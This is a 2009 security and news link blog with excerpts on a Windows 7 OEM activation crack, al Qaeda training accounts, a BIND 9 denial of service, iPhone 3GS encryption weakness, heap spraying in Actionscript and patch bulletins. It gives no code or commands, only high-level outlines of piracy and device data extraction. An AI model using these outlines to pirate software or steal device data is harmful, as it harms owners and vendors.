Windows 7 Ultimate Activation Cracked with OEM Master Key

Via arstechnica.com -

Windows 7 Ultimate has been cracked. The pirate milestone, reached almost three months before Windows 7 is set to hit General Availability on October 22, 2009, was achieved via OEM instant offline activation that passes Windows Genuine Advantage validation and keeps the operating system permanently activated. Previous cracks weren't as solid: while they may be working now, they can easily be disabled by Microsoft. This one won't be so easy.

Both 32-bit and 64-bit Windows 7 Ultimate can now easily be activated, according to My Digital Life. For Windows 7 Professional, Windows 7 Home Premium, Windows 7 Home Basic, and Windows 7 Starter, the OEM-System-Locked Preinstallation (SLP) keys haven't been leaked, so they cannot be OEM-activated yet. It won't be long before easy-to-use Windows 7 activation toolkits start appearing in the wild.

The story begins with a Windows 7 Ultimate OEM DVD ISO from Lenovo leaking to a Chinese forum. The boot.wim file was then used to retrieve the OEM-SLP product key and OEM certificate for Windows 7 Ultimate. The SLP is a procedure used by Microsoft to preactivate the Windows operating system for mass distribution by major OEMs. Windows 7 and Windows Server 2008 R2 use SLP version 2.1, which is backwards-compatible with version 2.0, the version Windows Vista and Windows Server 2008 use. As such, after the OEM certificate and OEM product key were extracted, it was discovered that Windows 7 uses the same digitally signed OEM certificate, which has an .xrm-ms extension, that Vista uses.

The extracted Windows 7 Ultimate OEM-SLP product key can be used to activate an installed Windows 7 Ultimate system, and since the product key appears to be a master OEM-SLP product key for Windows 7 Ultimate, it can activate Windows 7 Ultimate from any OEM. Furthermore, even if the user already has a retail version of Windows 7 Ultimate installed, it can be converted to an OEM version with two simple commands, and then activated.

This is a major breakthrough for the Windows piracy world and a huge blow to Microsoft. Even if it was imminent, the fact that it has occurred so soon means pirates will have activated copies of Windows 7 a good week before even MSDN and TechNet subscribers get their hands on the RTM build on August 6, not to mention all the other groups Microsoft plans to give the build to. The Windows 7 RTM and Windows Server 2008 RTM build was compiled on July 13, 2009 and the official announcement was made on July 22, 2009.

Al Qaeda’s Training Changes In Response To US Strikes

Via CNN (h/t National Terror Alert) -

The interrogations of two accused Westerners who say they trained and fought with al Qaeda in the Pakistan-Afghanistan border region provide an inside view of the terror group's organizational structures.

Arguably, they shed more light on the state of al Qaeda than any material previously released into the public domain.

The documents reveal training programs and the protective measures the terrorist organization has taken against increasingly effective U.S. missile strikes.

Bryant Vinas -- a U.S. citizen who says he traveled to Pakistan in September 2007 to fight against Americans in Afghanistan -- stated that between March and July 2008 he attended three al Qaeda training courses, which focused on weapons, explosives, and rocket-based or -propelled weaponry.

During these classes, attended by 10-20 recruits, Vinas was taught how to handle a large variety of weapons and explosives, some of them of military grade sophistication, according to his account.

Vinas stated he became familiar with seeing, smelling and touching different explosives such as TNT, as well as plastic explosives such as RDX, and Semtex, C3 and C4 -- the explosive U.S. authorities have stated was used in al Qaeda's attack on the USS Cole in 2000. Vinas also learned how to make vests for suicide bombers.

Vinas stated he was also instructed how to prepare and place fuses, how to test batteries, how to use voltmeters and how to build circuitry for a bomb.

According to his account, al Qaeda also offered a wide variety of other courses including electronics, sniper, and poisons training. Instruction in the actual construction of bombs, he stated, was offered to al Qaeda recruits who had become more advanced in their training.

[...]

Othmani provided interesting new details about the training facilities being used by al Qaeda in the tribal areas.

His group trained in a small mountain shack, a far cry from the large camps al Qaeda had run in Taliban-era Afghanistan, when it had been able to operate with little danger of being targeted by military strikes.

Othmani's account made clear that al Qaeda has had to decentralize its operations in Pakistan in response to the growing effectiveness of U.S. Predator strikes.

However the wide number of training courses described by both Vinas and Othmani suggest that al Qaeda has been able to adapt well to the new security environment.

[...]

Vinas stated that when they completed their training, Al Qaeda instructors did a written evaluation of their performance. Vinas had been judged qualified to participate in missile attacks against U.S. and NATO bases in Afghanistan, according to his account.

That suggests al Qaeda has maintained its capacity for administration and paperwork even in a harsher security environment.

[...]

He is believed to be still at large in the Pakistan-Afghan border area. Vinas was told that the training course that Hafith set up focused on kidnapping and assassination, including instruction on the use of silencers and how to break into and enter a property.

The revelations raise the possibility that al Qaeda was developing a program of targeted assassinations. Though al Qaeda has carried out some assassinations in the past, most of its attacks in the West have not targeted any particular individuals but crowded areas, such as mass transport.

According to Othmani, al Qaeda fighters totaled between 300-500 in Pakistan's Tribal Areas - spread out in groups of 10. Such decentralization was a function of the growing deadliness of U.S. Predator strikes.

Hicham Beyayo, a Belgian jihadist volunteer, said the group moved around a lot because such strikes were known to be "very effective," his lawyer Christophe Marchand, told CNN.

The loss of an increasing number of operatives, stated Othmani, prompted an order from al Qaeda's top command for fighters to remain inside as much as possible. In order to keep in touch jihadists operated a courier service across the region, according to the Frenchman's testimony.

FCC Opens Investigation into Apple's Rejection of Google Applications

Via battellemedia.com -

And they are opening an investigation into it.

According to a Dow Jones Newswire report, on Friday afternoon the FCC sent letters to Apple, AT&T, and Google. The federal inquiry asks Apple why the Google Voice application was rejected from its App Store for the iPhone and iPod Touch, and why it removed third-party applications built on the Google app that had been previously approved. The federal commission also asks whether AT&T was allowed to weigh in on the application before it was rejected, and seeks a description of the application from its creator, Google, according to the report.

For background, see my piece chastising Apple here.

Algorithm Sought by Air Force to Analyze Insider Behavior

Via Govinfosecuirty.org -

The Air Force is seeking an entrepreneurial innovator to develop technology to analyze the conduct of insiders to determine if they pose a threat to government IT systems.

In a call for proposals aimed at small businesses, posted on Tuesday, the Air Force is asking outside developers to "define, develop and demonstrate innovative approaches for determining 'good' (approved) versus 'bad' (disallowed/subversive) activities, including insiders and/or malware." For their initial efforts, the Air Force will pay up to $100,000.

The proposal says current techniques that monitor illicit activities only address the most blatant violations of policy or the grossest deviations from accepted behavior. Most systems concentrate their resources on repelling attacks at the network borders with little attention devoted to threats that evade detection and/or emanate from within. The proposal states:

"As such, there currently exists a great need across the federal, military and private sectors for a viable and robust means to provide near-real-time detection, correlation and attribution of network attacks, by content or pattern, without use of reactive previously-seen signatures. Many times, these trusted entities have detailed knowledge about the currently-installed host and network security systems, and can easily plan their activities to subvert these systems."

In the first phase, Air Force planners envision the development of a prototype algorithm that incorporates heuristic analysis for determining approved versus disallowed or subversive activities, including insiders and/or malware. The awarded contractor also would propose an architecture and perform a feasibility analysis of the algorithm and architecture during the initial phase.

In the second phase, the contractor would implement the best approach from Phase 1 in an experimental hardware/software environment, representative of the Air Force cyber infrastructure. They'd be asked to correlate Phase 1 analysis with experimental results as well as analyze the prototype system with respect to performance, scalability, cost, security and vulnerability.

Hafiz Mohammad Saeed – India’s Most Wanted Man Free Again in Pakistan

Via The Jamestown Foundation -

The release of Hafiz Mohammad Saeed, founder of proscribed Lashkar-e-Taiba (LeT) and Amir of Jama'at-ud-Da'wa (JuD), from detention last month in Pakistan has raised eyebrows in the West as well as India. He was released from house arrest on June 2 when the Lahore High Court ruled it did not have enough evidence against him on terrorism charges. However, Pakistan's Deputy Attorney General Shah Khawar says that Pakistan's law enforcement and intelligence agencies have enough evidence to suggest that a freed Hafiz Saeed is a continuing security threat. The Punjab provincial government and the federal government of Pakistan have already filed petitions before the Pakistani Supreme Court seeking a reversal of the decision of Lahore High Court. Nevertheless, the federal government continues to struggle to make an adequate case for his preventive detention and the Punjab provincial government has admitted its evidence is insufficient (The News [Islamabad], July 17; Daily Times [Lahore], July 17).

[...]

Hafiz Mohammad Saeed also met with Shaykh Abdullah Yusuf Azzam, an influential Palestinian jihad ideologue and mentor of Osama bin Laden. Azzam influenced him to found the Markaz Dawa-wa’l-Irshad (Center for Call and Guidance) in Muridke, Lahore in 1987. The institution preached jihad and the Wahhabi- Salafi form of Islam. Hafiz Saeed founded LeT in the early 1990s, allegedly with support from Inter-Services Intelligence (ISI), Pakistan's military intelligence agency. LeT then shifted the focus of its jihad from Afghanistan to Indian-administered Kashmir (The Hindu, June 3).

LeT is believed to have been involved in almost all major attacks against India over the disputed territory of Kashmir. Hafiz Saeed stepped down from the leadership of LeT soon after India blamed this group for the terrorist attack on its parliament in December 2001. He handed over leadership of the group to Maulana Abdul Wahid Kashmiri, who is based in Srinagar, part of Indian-administered Kashmir. Shortly after this, Pakistan banned LeT after the United States added it to its list of designated terrorist organizations.

However, Saeed was quick to revive his old Markaz Dawa-wa’l-Irshad organization with a slight modification of its name to Jama'at-ul-Da'wa, beginning as a charity and public welfare organization. It is common practice for militant organizations in Pakistan to rename themselves so as to bypass the law and avoid official bans. The old offices of LeT simply changed the names on their signboards with no significant change to the nature of the activities carried out inside. However, after 9/11, due to changes in Pakistan's policies towards India and pressure from the United States, Hafiz Saeed and his organization stepped back from aggressive jihadi activities in Kashmir. Despite this, several offices of LeT continued to recruit militants for jihad in Pakistan-administered Kashmir (BBC News, June 2).

India has long asked for the extradition of Hafiz Saeed, whom it suspects of being the mastermind behind all major terrorist attacks inside India. However, Pakistan’s government wants him to be tried inside Pakistan. So far, Pakistan has not brought sufficient evidence to punish him for his involvement in terrorist activities (Daily Times, June 5). Since 2001, he has been detained three times, but in every instance he was freed due to the apparent lack of evidence against him. In July 2006, India asked the Government of Pakistan to ban the JuD and arrest its leaders, including Hafiz Saeed, for their alleged involvement in the July 11 Mumbai train bombings that killed over 200 people. Pakistan rejected the Indian claims and put Hafiz Saeed under house arrest. He was released a month later (Hindustan Times, June 2).

The Pwnie Awards 2009 Winners

The Pwnie Awards is an annual awards ceremony celebrating and making fun of the achievements and failures of security researchers and the wider security community.

Pwnie Awards 2009 Winners....

Best server side bug = Linux SCTP FWD Chunk Memory Corruption

Best client side bug = msvidctl.dll MPEG2TuneRequest Stack buffer overflow

Best privilege escalation = Linux udev Netlink Message Privilege Escalation

Mass 0wnage = Red Hat Networks Backdoored OpenSSH Packages

Most innovative research = From 0 to 0day on Symbian

Lamest vendor response = Linux / Linus Torvalds

Most overhyped bug = MS08-067 Server Service NetpwPathCanonicalize() Stack Overflow

Best song = Nice Report

Most epic fail = Twitter Gets Hacked and the "Cloud Crisis

Lifetime achievement award = Solar Designer

------------------------------

Special thanks to @shazzzam for the play-by-play on twitter. I had to run out after the "most epic fail" to catch my reservation @ MESA Grill.

For the curious foodies out there, I had the Fire Roasted Veal Chop with a glass of Voss Estate Pinot Noir...then the toasted coconut layer cake and black coffee for desert. So very good.

Venezuela Increases Military Co-operation with Russia

Via Janes.com -

The televised signing of the 'New Statute on Military-Technical Co-operation' followed an earlier announcement by Venezuelan President Hugo Chávez on 24 July that Venezuela was intending to buy enough Russian tanks to double its fleet.

BIND 9 Denial of Service Attacks in the Wild

Via SANS ISC -

Earlier today Marc posted a short diary about a vulnerability in the Internet Systems Consortium's BIND 9 (all versions). As you almost certainly know, BIND is the most popular DNS service application running on majority of DNS servers today – and DNS is one service that we *really* need.

As the DoS attacks have been seen in the wild, and simple scripts that can be used to reproduce the attack are also easily available, this is not really surprising.

I wanted to draw your attention to this vulnerability (if you are running a BIND DNS server) – although the vulnerability exists in the dynamic update feature of BIND, even installations that have dynamic updates disabled are affected! This makes this vulnerability especially dangerous.

Only servers hosting master zones are vulnerable though, so even if the master DNS servers are down, all slaves should still continue to work (I'm not sure what happens if those slaves are masters for some other zones and they are subsequently taken down).

No workarounds exist – you might be able to create some firewall rules that will drop these packets though. In any case, it is recommended to upgrade your BIND DNS servers urgently from https://www.isc.org/node/474

Apple: Jailbreaking Could Knock out Transmission Towers

Via PC World -

Apple has told the U.S. Copyright Office that modifying the iPhone's operating system could crash a mobile phone network's transmission towers or allow people to avoid paying for phone calls.

The claims are Apple's contribution to the Copyright Office's regular review of the U.S. Digital Millennium Copyright Act (DMCA), a law that forbids the circumvention of copy control mechanisms.

Apple says that modification of the phone's software, a process known as jailbreaking, could lead to major network disruptions. Jailbreaking gets around the copyright control features that prohibit, for example, the installation of applications unapproved by Apple.

Apple's arguments, filed June 23, seek to rebut a request to the agency by the digital rights group Electronic Frontier Foundation (EFF) that modifications to the iPhone's software do not violate the DMCA and should be allowed.

The U.S. Copyright Office holds hearings every three years to consider requests to make exceptions to the nation's copyright law.

Jailbreaking continues to be popular with iPhone users, who can also then use their devices on the networks of operators who have not signed distribution deals with Apple.

Apple argues that the practice constitutes copyright infringement. No one has been prosecuted for jailbreaking, although Apple discourages it.

Apple's latest filing describes potentially severe technical problems operators could face with jailbroken phones.

Since the OS code is accessible on a jailbroken phone, Apple said it would be possible to reprogram one to gain access to the phone's BBP (baseband processor), which controls the connection to the operator's network.

"Because jailbreaking makes hacking of the BPP software much easier, jailbreaking affords an avenue for hackers to accomplish a number of undesirable things on the network," the filing said.

By gaining access to the BPP, hackers could change the phone's ECID (exclusive chip identification), which identifies a phone to the transmission towers, Apple said.

"With access to the BBP via jailbreaking, hackers may be able to change the ECID, which in turn can enable phone calls to be made anonymously (this would be desirable to drug dealers, for example) or charges for the calls to be avoided," Apple said.

While some of Apple's claims may be true, network operators rely on a separate identifier, contained in the phone's SIM (Subscriber Identity Module), to distinguish between customers for billing and authentication purposes.

Apple went on to say that if several phones were modified to have the same ECID, it could cause a transmission tower to malfunction or kick phones off the network. Also, operator limits on data transmission could be circumvented, allowing a hacker to conduct a denial-of-service attack and crash the tower.

"In short, taking control of the BPP software would be much the equivalent of getting inside the firewall of a corporate computer -- to potentially catastrophic result," Apple said.

Technical considerations aside, the EFF has argued that Apple's lock on the iPhone is unmerited from a copyright protection perspective and aims to "suppress competition from independent iPhone application vendors."

The Copyright Office is expected to make a decision in the case later this year.

Data Detailing New York Stock Exchange Network Exposed on Unsecured Server

Via Wired.com (Threat Level) -

Sensitive information about the technical infrastructure of the New York Stock Exchange’s computer network was left unsecured on a public server for possibly more than a year, Threat Level has learned.

The data, which was removed after Threat Level disclosed the situation to the NYSE, included several directories of files containing logs; server names; IP addresses; lists of hardware; lists of software versions running on the network; and configuration and patch histories, including what patches have not yet been installed. It was all available on a publicly accessible, unprotected FTP server maintained by EMC, a company that sells storage systems and managed services to the NYSE and other companies.

“We have discussed the matter with EMC and at this point we believe that there has been no impact on our operations or our customers,” said NYSE spokeswoman Mirtha Medina in an e-mail.

“Unless the NYSE knows that this stuff is out there and has approved for it to be out there (highly doubtful), I see no good reason why EMC is allowing this to happen,” said an information security specialist via e-mail who asked not to be named because he works in the financial industry. “Leaving information like this in a ‘public’ place definitely would make a bad guy’s job somewhat easier.”

The information could allow an intruder to map the NYSE’s network architecture and determine what vulnerabilities exist in the system.

Cheerleader Sues School, Coach After Illicit Facebook Log-in

Via arstechnica.com -

At this point, you would think that most users would be aware that they should keep embarrassing information off of Facebook. Everyone from potential employers to the press regularly check users' accounts on the service, looking for evidence of illicit or debauched behavior, and a number of jobs have been lost due to the information found there. Still, many fail to exercise discretion when using the service, people in positions of power are catching on, and there continue to be problems that result from the blurring of boundaries between public and private.

In what may be the latest example, a suit was filed in Mississippi that alleges a school official—more specifically a teacher acting in her capacity as a cheerleading coach—demanded that members of her squad hand over their Facebook login information. According to the suit, the teacher used it to access a student's account, which included a heated discussion of some of the cheerleading squad's internal politics. That information was then shared widely among school administrators, which resulted in the student receiving various sanctions.

As we noted when Bozeman, Montana attempted to obtain login credentials from anyone applying for a municipal job, it's easy for anyone to view pictures and text that a Facebook user has chosen to make public simply by signing up for an account with the service. By demanding login credentials, authorities gain access to materials that users have chosen to keep private. Whether this is done because people intend to get access to private data or because they are simply unfamiliar with how Facebook operates isn't always obvious, and probably varies from case to case.

According to this suit, the student's login details were requested during school hours, and the teacher accessed the account the same day. The account included the contents of a discussion between the student and a fellow member of the school's cheerleading squad about its internal politics, which was then allegedly shared with other squad supervisors and the school administration. The student was then "publicly reprimanded, punished, and humiliated" due to the contents of that discussion.

The student was allegedly forced to sit out of various school activities and had difficulties arranging her academic schedule to avoid taking classes from any of the individuals who were both coaches and teachers. Her parents claim that attempts to discuss the problem with school administrators brought them no relief.

The Student Press Law Center has more detailed account (via TechDirt) of the events, in which it reports that several other students asked for their logins simply deleted their accounts using their cell phones, preventing this sort of intrusion; the schools apparently have a filter that blocks access to its Web interface from school computers. It also suggests that the initial search of the Facebook accounts was done with the intent of finding pictures of the students smoking or drinking.

In any case, the suit alleges that the school's administration and staff, along with five John Does, violated the student's Constitutional rights to privacy, free speech and association, and subjected her to cruel and unusual punishment. There are also charges of causing emotional distress, defamation of character, and civil conspiracy. In general, courts have concluded that public school students have some constitutional rights, but only a subset of those afforded to the general populace. It may be that the student's lawyers are aiming broadly in order to find some area of constitutional law in which the student is clearly protected.

In any case, the message should be clear: either through malice or cluelessness, people in positions of authority are increasingly demanding complete access to users' personal accounts and, in moments of weakness, many users appear to be giving it to them. If there's information you're not comfortable sharing with the world, Facebook, Twitter, and similar services aren't the place for it.

Vegas Baby! Vegas!

So, I am packing for Blackhat 2009 and Defcon 17. Should be there before 5pm local time tomorrow.

Blog might be a little quiet this week, but I will try to post when I can...when I am not "working" or being social. =)

Russian Navy Accidentally Dummy Shells Vladivostok

Via Moscow Times -

A dummy shell fired from a warship veered off course Friday and landed just feet from a building in a residential area of Vladivostok, less than two months after a similar incident off the Gulf of Finland.

The anti-ship shell was fired during rehearsals for Sunday’s Navy Day celebrations in the far eastern port. For reasons yet to be determined, the projectile changed course after takeoff and landed beside a nine-story building, breaking windows and leaving a 1.5-meter crater, RIA-Novosti reported.

No one was hurt in the incident, and the Navy said it was investigating.

A bomb disposal team from the Pacific Fleet was sent to dig out and remove the shell. Military officials said it was intended only to make a sound effect for the parade.

Pacific Fleet spokesman Roman Martov said experts would evaluate what caused the bomb to deviate from its course. “All the parameters were set right, it was supposed to fall into the ocean,” he said, Interfax reported.

On May 28, a similar incident happened in the Leningrad region, when a Russian warship in the Gulf of Finland fired 14 shells in the direction of a dacha settlement on shore.

Fragments of the shells rained down on the village, but damage was minimal and no one was injured. The Navy later promised the dacha settlement “several tens of thousands of rubles” in damages, Ekho Moskvy reported.

Microsoft Office Visualization Tool (OffVis)

http://www.microsoft.com/presspass/press/2009/jul09/07-27BlackHat09PR.mspx

A free tool designed to help combat file format-based software vulnerabilities and exploits, OffVis will allow customers to better understand and deconstruct Microsoft Office-based attacks. As a result, security vendors can build deeper, more precise malware detection signatures and develop new techniques for analyzing malware. The tool is available for no-charge download.

Advance Notification for July 2009 Out-of-Band Releases

http://blogs.technet.com/msrc/archive/2009/07/24/advance-notification-for-july-2009-out-of-band-releases.aspx

We have just published our advance notification for an out-of-band security bulletin release, with a target of 10:00 AM Pacific Time next Tuesday, July 28, 2009.

While this release is to address a single, overall issue, in order to provide the broadest protections possible to customers, we’ll be releasing two separate security bulletins:

1. One Security Bulletin for Visual Studio
2. One Security Bulletin for Internet Explorer

While we can’t go into specifics about the issue prior to release, we can say that the Visual Studio bulletin will address an issue that can affect certain types of applications. The Internet Explorer bulletin will provide defense-in-depth changes to Internet Explorer to help provide additional protections for the issues addressed by the Visual Studio bulletin. The Internet Explorer update will also address vulnerabilities rated as Critical that are unrelated to the Visual Studio bulletin that were privately and responsibly reported.

Customers who are up to date on their security updates are protected from known attacks related to this Out of Band release.

Nearly Half Of Companies Lack A Formal Patch Management Process

Via DarkReading -

An open initiative for building a metrics model to measure the cost of patch management found that one-fourth of organizations don't test patches when they deploy them, and nearly 70 percent don't measure how well or efficiently they roll out patches, according to survey results released today.

Project Quant, a project for building a framework for evaluating the costs of patch management and optimizing the process, today also rolled out Version 1 of its metrics model today. Project Quant is an open, community-driven, vendor-neutral model that initially began with financial backing from Microsoft.

"Based on the survey and the additional research we performed during the project, we realized that despite being one of the most fundamental functions of IT, patch management is still a relatively immature, inconsistent, and expensive practice. The results really reinforced the need for practical models like Quant," says Rich Mogull, founder of Securosis, and one of the project leaders of the initiative.

The survey of around 100 respondents was voluntary and participation was solicited mainly via metrics and patch management organizations, so the organizers say the respondents were most likely organizations that take patch management seriously: "The corollary to this interpretation is that we believe the broader industry is probably LESS mature in their patch management process than reflected here," the report says.

Even so, over 40 percent of them have either no patch management process in place, or an informal one. And 68 percent say they don't have a metric for measuring how well they deploy patches, such as the time it takes them to deploy a patch, etc. One-fourth say they don't do any testing before they roll out a patch, and 40 percent rely on user complaints to validate the success of a patch, according to the survey.

And over 50 percent don't measure adherence to policy, including compliance when it comes to patching.

"It's clear we have a very long way to go on something we all assume is a boring, basic task. Considering where the bad guys are shifting attacks to, we desperately need better methods and means of keeping our systems up to date," Mogull says. "My hope is that Quant can help fill this gap."

Patch management for workstation and server operating systems was one of the most mature processes. "What's most interesting is the variation of maturity [of patch management] across platforms. Not that this was totally unexpected, but the least mature areas of patching seem to correlate almost directly with the fastest-growing areas of attacks," Mogull says, such as device drivers, database servers, business application servers, and networking hardware and software.

Meanwhile, Project Quant's survey is ongoing, so if you'd like to participate, visit this link.

--------------------------

As a former patch administrator ...this topic hits home with me.

So many companies are behind the curve on patch management, it is quite shocking.

Kevin Spacey Tries, Fails To Explain Twitter To Letterman

802.11N Becomes Official In September

Via DSLReports.com -

Last Friday, Bob Heile, the chairman of the IEEE 802.15 working group on Personal Area Networks, noted that the 802.11N Wi-Fi standard has finally been sent on to the Standards Review Committee. That means, assuming no further hiccups, that the standard will become finalized by September. The ratification process stems back nearly five years, slowed by a factionalized debate over competing technologies. A draft version of 802.11n was approved in January 2006, and the first wave of 802.11N hardware hit the market -- with all subsequent evolutions (supposedly) applied by firmware update.

Matasano Hack by Anti-Sec Supporters

http://seclists.org/fulldisclosure/2009/Jul/0388.html

Mirror Screenshot
http://users.volja.net/database/matasano.PNG

Currently the Matasano website appears to be down, which is it a good indication that this is no fake.

PhreakNIC 12 Videos

PhreakNIC is a annual convention for hackers, phone phreaks, cypherpunks, programmers, civil libertarians, ham/scanner enthusiasts, security experts, feds, and culture jammers held in Nashville, TN.

IronGeek.com has put together an index page for all the videos...
http://www.irongeek.com/i.php?page=videos/pn12/phreaknic-12-videos

Defcon iPhone Application

http://www.group6.net/Defcon_App.html

DEFCON® Hacker Conference - The Hacker Community's Foremost Social Network.

After years of misplaced, begged, borrowed, stolen Defcon schedules, we decided to do something to help. Introducing the Defcon iPhone app. Get all the up to date details on the con on your iPhone/iPod Touch. In addition to that, you can view the official Defcon RSS feed and #defcon Twitter posts. Talk and event calendars, speaker and dj bios, and a map of the venue.

Features:

1. Talk Calendar
2. Event Calendar
3. Speaker/DJ Biographies
4. Defcon RSS Feed Reader
5. Twitter #defcon

Status: Available Soon

The app has currently been submitted for Apple’s approval into their store. We’re looking at other options for distribution in case the app does not get approved in time. Follow @dtjedi or @tkimball via twitter for updates or check back here.

Hacker Says iPhone 3GS Encryption Is ‘Useless’ for Businesses

Via Wired.com -

Apple claims that hundreds of thousands of iPhones are being used by corporations and government agencies. What it won’t tell you is that the supposedly enterprise-friendly encryption included with the iPhone 3GS is so weak it can be cracked in two minutes with a few pieces of readily available freeware.

“It is kind of like storing all your secret messages right next to the secret decoder ring,” said Jonathan Zdziarski, an iPhone developer and a hacker who teaches forensics courses on recovering data from iPhones. “I don’t think any of us [developers] have ever seen encryption implemented so poorly before, which is why it’s hard to describe why it’s such a big threat to security.”

With its easy-to-use interface and wealth of applications available for download, the iPhone may be the most attractive smartphone yet for business use. Many companies seem to agree: In Apple’s quarterly earnings conference call Tuesday, Apple chief operating officer Tim Cook said almost 20 percent of Fortune 100 companies have purchased 10,000 or more iPhones apiece; multiple corporations and government organizations have purchased 25,000 iPhones each; and the iPhone has been approved in more than 300 higher education institutions.

But contrary to Apple’s claim that the new iPhone 3GS is more enterprise friendly (for reference, see Apple’s security overview for iPhone in business [pdf]), the new iPhone 3GS’ encryption feature is “broken” when it comes to protecting sensitive information such as credit card numbers and social-security digits, Zdziarski said.

Zdziarski said it’s just as easy to access a user’s private information on an iPhone 3GS as it was on the previous generation iPhone 3G or first generation iPhone, both of which didn’t feature encryption. If a thief got his hands on an iPhone, a little bit of free software is all that’s needed to tap into all of the user’s content. Live data can be extracted in as little as two minutes, and an entire raw disk image can be made in about 45 minutes, Zdziarski said.

Wondering where the encryption comes into play? It doesn’t. Strangely, once one begins extracting data from an iPhone 3GS, the iPhone begins to decrypt the data on its own, he said.

To steal an iPhone’s disk image, hackers can use popular jailbreaking tools such as Red Sn0w and Purple Ra1n to install a custom kernel on the phone. Then, the thief can install an Secure Shell (SSH) client to port the iPhone’s raw disk image across SSH onto a computer.

To demonstrate the technique, Zdziarski established a screenshare with Wired.com, and he was able to tap into an iPhone 3GS’ data with a few easy steps. The encryption did not pose any hindrance.

Nonetheless, professionals using the iPhone for business don’t seem to care, or know, about the device’s encryption weakness.

“We’re seeing growing interest with the release of iPhone 3.0 and the iPhone 3GS due in part to the new hardware encryption and improved security policies,” Cook said during Apple’s earnings call. “The phone is particularly doing well with small businesses and large organizations.”

Clearly, the gigantic offering of iPhone applications is luring these business groups. Quickoffice Mobile, for example, enables users to access and edit Microsoft Word or Excel files on their iPhone. For handling transactions, merchants can use apps such as Accept Credit Cards to process a credit card on an iPhone anywhere with a Wi-Fi or cellular connection.

Several employees of Halton Company, an industrial equipment provider, are using iPhones for work, according to Lance Kidd, chief information officer of the company. He said the large number of applications available for the iPhone make it worthy of risk-taking.

“Your organization has to be culturally ready to accept a certain degree of risk,” Kidd said. “I can say we’ve secured everything as tight as a button, but that won’t be true…. Our culture is such that our general manager is saying, ‘I’m willing to take the risk for the value of the applications.’”

Kidd noted that Halton employees are not using iPhones for holding confidential customer information, but rather for basic tasks such as e-mailing and engaging with clients via social networking sites such as Facebook and Twitter. Halton also plans to code apps strictly for use at the company, Kidd said.

According to Kidd, a security expert performed an evaluation of Halton, and he said it was possible for any hacker to find an infiltration no matter the level of security. Therefore, Halton has measures in place to respond to an information security threat rather than attempt to avoid it.

“It’s like business continuity,” Kidd said. “You prepare for disasters. You prepare for if there’s an earthquake and the building breaks down, and you prepare for if there’s a crack in [information] security.”

But Zdziarski stands firm that the iPhone’s software versatility isn’t worth the risk for use in the workforce. He said sensitive information is bound to appear in e-mails or anything that can be contained on the iPhone’s disk, which can be easily extracted by thieves thanks to the new handset’s shoddy encryption.

---------------------

Lets get real here, the iPhone was never designed for business. It was born from the hugely popular iPod, which we would all agree wasn't designed with business needs in mind either.

Beyond the weak encryption on the device itself...why would any company want iTunes and Quicktime installed on its laptop, especially if they aren't required for business. Personally, I don't see many business benefits in iTunes anyways.

Every piece of software that is installed on a system increases its possible attack surface. Combined with Apple's lack luster security practices (both on a coding level & a communication level)....you have a recipe for increased risk of data breach...both on the iPhone and the machines used to manage it.

In 2007, Gartner suggested to keep the iPhone out of enterprise...and from a strictly security perception, I see few reason overall to change that suggestion.

Blackhat 2009 Preview - Bypassing IE ActiveX Killbits

Preview Video
http://www.hustlelabs.com/bh2009preview/

Blackhat 2009 - The Language of Trust: Exploiting Trust Relationships in Active Content
https://www.blackhat.com/html/bh-usa-09/bh-usa-09-speakers.html#Dowd

SHA-3 Second Round Candidates

NIST has selected the Second Round Candidates of the SHA-3 Competition. A report summarizing NIST’s selection of these candidates will be forthcoming. A year is allocated for the public review of these algorithms, and the Second SHA-3 Candidate Conference is being planned for August 23-24, 2010, after Crypto 2010.

------------------

Make sure you check out the SHA-3 Zoo as well...good stuff.

Al-Shabaab Takes Over Two United Nations Offices in Somalia

Via Shimron Letters -

The Somali armed rebel group, Al Shabaab, looted two UN compounds and demanded an end to UN relief work in the impoverished Horn of Africa nation, the UN said Monday.

Al Shabaab, which has been trying to overthrow the transitional government in Mogadishu, looted the UN compound in Baidoa of emergency communication equipment, forcing the organisation to evacuate personnel and suspend its operations.

The UN said it was powerless when challenged by the rebels because the compound had no security guards.

In Wajid, protected by a minimum security, the rebels entered the compound of the World Food Programme and drove away with two vehicles and some furniture that did not belong to the UN.

“These two events happened as Al Shabaab broadcast on Monday a message on local Somali radio calling for the closing of offices” of several UN agencies, including the UN Development Programme, the UN said.

“The UN is reassessing the situation on the ground and is optimistic that the minimal conditions on the ground will be restored to allow the critical humanitarian work to resume in Baidoa and continue elsewhere in Somalia,” the UN said.

Russian Navy Declassifies Cold War Close Encounters

Via Wired.com (Danger Room) -

Great catch by Phil Ewing at Navy Times‘ Scoop Deck blog: the Russian navy has just declassified its records of Cold War UFO sightings. Turns out “50 percent of UFO encounters are connected with oceans. Fifteen [percent] more — with lakes. So UFOs tend to stick to the water,” one Russian officer explained.

“On several occasions the instruments gave reading of material objects moving at incredible speed,” a sub commander recalled. “Calculations showed speeds of about 230 knots, or 400 kph. Speeding so fast is a challenge even on the surface. But water resistance is much higher. It was like the objects defied the laws of physics. There’s only one explanation: the creatures who built them far surpass us in development.”

Insert jab about superior U.S. Navy submarine technology, here.

All joking aside, in one alleged incident in 1982, three navy diver trainees reportedly died pursuing what survivors described as “a group of humanoid creatures dressed in silvery suits” in Baikal, the world’s deepest lake.

Heap Spraying with Actionscript

Via FireEyes Malware Intelligence Lab -

As you may have heard, there's a new Adobe PDF-or-Flash-or-something 0-day in the wild. So this is a quick note about how it's implemented, but this blog post is not going to cover any details about the exploit itself.

Most of the Acrobat exploits over the last several months use the, now common, heap spraying technique, implemented in Javascript/ECMAscript, a Turing complete language that Adobe thought would go well with static documents. (Cause that went so well for Postscript) (Ironically, PDF has now come full circle back to having the features of Postscript that it was trying to get away from.) The exploit could be made far far less reliable, by disabling Javascript in your Adobe Acrobat Reader.

But apparently there's no easy way to disable Flash through the UI. US-CERT recommends renaming the %ProgramFiles%\Adobe\Reader 9.0\Reader\authplay.dll and %ProgramFiles%\Adobe\Reader 9.0\Reader\rt3d.dll files. [Edit: Actually the source for this advice is the Adobe Product Security Incident Response Team (PSIRT).]

Anyway, here's why… Flash has it's own version of ECMAScript called Actionscript, and whoever wrote this new 0-day, finally did something new by implementing the heap-spray routine with Actionscript inside of Flash.

Microsoft Scrambling to Close Stubborn Security Hole

Via Security Fix -

Microsoft may soon be taking the unusual step of issuing an out-of-band security update to address multiple weaknesses that stem from a Windows security flaw that the software giant tried to fix earlier this month, Security Fix has learned.

